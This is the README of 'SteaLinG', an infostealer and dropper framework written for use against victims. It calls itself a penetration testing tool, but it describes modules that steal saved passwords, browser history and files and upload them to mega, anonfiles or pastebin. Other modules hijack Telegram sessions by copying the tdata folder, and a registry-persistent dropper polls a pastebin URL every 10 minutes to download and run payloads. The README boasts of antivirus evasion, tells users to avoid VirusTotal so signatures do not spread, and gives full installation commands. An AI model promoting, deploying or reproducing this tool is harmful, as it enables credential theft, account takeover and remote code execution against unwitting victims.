SteaLinG v0.3
Description
The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it
disclaimers:
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
How can I benefit from this project?
- you can use it
π - for developers
you can read the source code and try to understand how to make a project like this
Features
module | Short description |
---|---|
Dump passwords | steal All passwords saved , upload file a passwords saved to mega - anonfiles -pastebin |
Dump History | dump browser history upload file a History saved to mega - anonfiles -pastebin |
dump files | Steal files from the hard drive with the extension you want upload to mega |
Telegram Session Hijack | Telegram session hijacker upload to anonfiles |
Dropper | See below |
New features
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
- How it works ?
The recording session in Telegram is stored locally in this particular path
C:\Users<pc name >\AppData\Roaming\Telegram Desktop
in the 'tedata' folder
C:
βββ Users
βββ .AppData
βΒ Β βββ Roaming
βΒ Β βββ TelegramDesktop
βΒ Β βββ tdata
Once you have moved this folder, along with all its contents, to your device in the same path, you will simply need to perform the required action. The tool will take care of everything, and all you need to do is provide your token on the https://anonfiles.com/
website. The first step is to navigate to the location of the tdata file, and then convert it to a zip file. If Telegram is functioning correctly, then this error will not occur. If an error does occur, it means that Telegram is open, and you should terminate its processes. You will notice that this behavior is malicious, so I have completely avoided it by using try and except in the code. The name of the archive file is used in the name of the victim's device, because if you have multiple devices, it is possible to differentiate between them. After that, you will submit a request for the zipfile on the anonfiles website using the API key or the token of your account on the site. Your token can be found there. That's all, teacher, and it is not detected by any antivirus software.
module |
---|
2- Dropper |
- What requirements does he need from you?
- And how does it work?
- Requirements:
The first thing he asks for is the URL of the virus or whatever you want to download onto the victim's device. Keep in mind that the URL must be direct, meaning that it must be the end of it. Its extension should be
.exe
or.png
, or any other important extension. The important thing is that thelink
ends with a extension(.any extension)
. The second thing is to obtain theAPI key
from you, which you will also provide. You can register and click on the"API"
word to find it, and then take note of theusername
andpassword
. - So, how does it work?
The first thing to do is to create a private paste on the website. After that, it adds the URL you provided and gives you the executable (exe
) file. Its function is to add itself to the device's registry in two different ways when it runs on any device.
First, it opens the Pastebin website and inserts the special paste you created. It then takes the paste URL
, downloads its content, and runs it. Additionally, you can enter another URL
at any time. This is very normal because the dropper checks the URL every 10 minutes. If it finds a new URL, it downloads its content, connects to it, and continues to run. You don't have to do anything. Therefore, every 10 minutes, you can access your device from anywhere.
3- Linux support
4-You can now choose between Mega or Pastebin
Requirements
- python >= 3.8 ++ Download Python
- os : Windows
- os : Linux
Installation to Windows:
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
Installation to Linux
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
warning:
* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!
AV detection
Media
[+] Find Me on :
Abdulrahman Mohammed
If this tool has been useful for you, feel free to thank me by buying me a coffee :)